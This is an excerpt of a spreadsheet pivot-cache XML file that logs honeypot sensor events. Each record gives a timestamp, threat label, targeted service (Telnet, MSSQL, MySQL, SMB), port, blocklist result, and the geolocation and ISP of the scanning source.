    <s v="NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.166.217.205,60457)}&amp;&amp;{Data_SMB:Incoming connection (202.166.217.205,60700)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:caa6:d9cd"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2707"/>
    <x v="2707"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T15:54:31"/>
    <d v="2025-04-07T15:54:31"/>
    <d v="2025-04-07T15:54:31"/>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3d00:6c4b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2708"/>
    <x v="2708"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T15:50:42"/>
    <d v="2025-04-07T15:50:42"/>
    <d v="2025-04-07T15:50:42"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (RajajiNagar)"/>
    <s v="1277333"/>
    <s v="560010"/>
    <s v="13.0123"/>
    <s v="77.5558"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Quadgen WiFi Project C/O Addl GM P3 Bangalore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d02:9c68"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2709"/>
    <x v="2709"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T15:35:39"/>
    <d v="2025-03-20T15:29:23"/>
    <d v="2025-04-07T15:35:39"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="AR"/>
    <s v="Argentina"/>
    <s v="C"/>
    <s v="Buenos Aires F.D."/>
    <s v="Comuna 14"/>
    <s v="Buenos Aires (Palermo)"/>
    <s v="3435910"/>
    <s v="NA"/>
    <s v="-34.5752"/>
    <s v="-58.4359"/>
    <s v="7303"/>
    <s v="Telecom Argentina S.A."/>
    <s v="Telecom Argentina S.A."/>
    <s v="business"/>
    <s v="Telecom Argentina S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b5e6:aa86"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2710"/>
    <x v="2710"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T15:27:10"/>
    <d v="2025-03-14T18:15:46"/>
    <d v="2025-04-07T15:27:10"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Ahmadabad"/>
    <s v="Bopal"/>
    <s v="13157139"/>
    <s v="NA"/>
    <s v="23.0334"/>
    <s v="72.4672"/>
    <s v="132923"/>
    <s v="Vihaan Telecommunication Pvt. Ltd."/>
    <s v="Vihaan Telecommunication Pvt. Ltd."/>
    <s v="business"/>
    <s v="Vihaan"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67f0:20e4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2711"/>
    <x v="2711"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T15:22:59"/>
    <d v="2025-04-07T15:20:58"/>
    <d v="2025-04-07T15:22:59"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Konkan Division"/>
    <s v="Mumbai (Chakala Industrial Area)"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.1205"/>
    <s v="72.8694"/>
    <s v="17665"/>
    <s v="ONEOTT INTERTAINMENT LIMITED"/>
    <s v="ONEOTT iNTERTAINMENT LIMITED"/>
    <s v="business"/>
    <s v="Oneott Intertainment Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67fb:3549"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2712"/>
    <x v="2712"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T14:52:50"/>
    <d v="2025-04-07T14:50:49"/>
    <d v="2025-04-07T14:52:50"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Kozhikode"/>
    <s v="Kozhikode"/>
    <s v="1265873"/>
    <s v="NA"/>
    <s v="11.248"/>
    <s v="75.7804"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Rjil Internet"/>
    <s v="2010-10-27"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:312f:c575"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2713"/>
    <x v="2713"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T14:30:21"/>
    <d v="2025-04-07T13:44:33"/>
    <d v="2025-04-07T14:30:21"/>
    <n v="39"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Kolkata"/>
    <s v="Kolkata"/>
    <s v="1275004"/>
    <s v="NA"/>
    <s v="22.5626"/>
    <s v="88.363"/>
    <s v="135872"/>
    <s v="GTPL KCBPL BROADBAND PVT LTD"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="residential"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="2016-03-15"/>
    <s v="GTPLKCBPL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67d3:85cc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2714"/>
    <x v="2714"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T14:26:00"/>
    <d v="2025-04-07T14:26:00"/>
    <d v="2025-04-07T14:26:00"/>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d4:3118"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2715"/>
    <x v="2715"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T14:22:43"/>
    <d v="2025-04-07T14:22:43"/>
    <d v="2025-04-07T14:22:43"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b60:b8e6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2716"/>
    <x v="2716"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T14:16:39"/>
    <d v="2025-04-02T02:47:55"/>
    <d v="2025-04-07T14:16:39"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="56"/>
    <s v="Bắc Ninh Province"/>
    <s v="Thành Phố Bắc Ninh"/>
    <s v="Bắc Ninh"/>
    <s v="1591449"/>
    <s v="NA"/>
    <s v="21.1861"/>
    <s v="106.076"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-05-18"/>
    <s v="vtn-net"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:defc:9487"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2717"/>
    <x v="2717"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T14:11:56"/>
    <d v="2025-01-14T19:11:57"/>
    <d v="2025-04-07T14:11:56"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H23"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="KR"/>
    <s v="Riau Islands"/>
    <s v="Tanjung Pinang"/>
    <s v="Tanjung Pinang"/>
    <s v="1624863"/>
    <s v="NA"/>
    <s v="0.920995"/>
    <s v="104.514"/>
    <s v="140472"/>
    <s v="PT Dinamika Karya Adicita"/>
    <s v="DIKA"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.153.193.206,61980)}&amp;&amp;{Data_SMB:Incoming connection (103.153.193.206,62409)}&amp;&amp;{Data_SMB:Incoming connection (103.153.193.206,60617)}&amp;&amp;{Data_SMB:Incoming connection (103.153.193.206,60996)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.153.193.206,58115)}&amp;&amp;{Data_SMB:Incoming connection (103.153.193.206,58494)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6799:c1ce"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2718"/>
    <x v="2718"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T14:01:04"/>
    <d v="2024-07-11T11:34:00"/>
    <d v="2025-04-07T14:01:04"/>
    <n v="68"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MT-CPA_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;12581&amp;&amp;34553&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6da2:3a51"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2719"/>
    <x v="2719"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T13:39:21"/>
    <d v="2025-03-31T16:16:10"/>
    <d v="2025-04-07T13:39:21"/>
    <n v="40"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="3306&amp;&amp;1433&amp;&amp;52068"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Hyderabad"/>
    <s v="Hyderabad"/>
    <s v="1269843"/>
    <s v="NA"/>
    <s v="17.3841"/>
    <s v="78.4564"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Rjil Internet"/>
    <s v="None"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:312b:daea"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2720"/>
    <x v="2720"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T13:33:54"/>
    <d v="2025-04-07T13:33:54"/>
    <d v="2025-04-07T13:33:54"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'spamsources.fabel.dk': ['unknown']}"/>
    <n v="37"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:ebf0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2721"/>
    <x v="2721"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T13:01:05"/>
    <d v="2024-12-27T00:11:45"/>
    <d v="2025-04-07T13:01:05"/>
    <n v="40"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="63"/>
    <s v="Kharkivs’ka Oblast’"/>
    <s v="Kharkiv Raion"/>
    <s v="Kharkiv"/>
    <s v="706483"/>
    <s v="NA"/>
    <s v="50.002"/>
    <s v="36.3074"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e76:eee9"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2722"/>
    <x v="2722"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T12:56:13"/>
    <d v="2025-04-07T12:53:20"/>
    <d v="2025-04-07T12:56:13"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai (Azad Nagar)"/>
    <s v="1275339"/>
    <s v="400053"/>
    <s v="19.0355"/>
    <s v="72.9454"/>
    <s v="134937"/>
    <s v="Speed Communication"/>
    <s v="Sukain Infoway Pvt Ltd"/>
    <s v="business"/>
    <s v="Sukain Infoway Private Limited"/>
    <s v="2017-07-18"/>
    <s v="SUKAIN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6761:6019"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2723"/>
    <x v="2723"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T12:55:30"/>
    <d v="2025-04-07T12:55:30"/>
    <d v="2025-04-07T12:55:30"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c2:dc0a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2724"/>
    <x v="2724"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T12:50:46"/>
    <d v="2025-04-07T12:48:42"/>
    <d v="2025-04-07T12:50:46"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
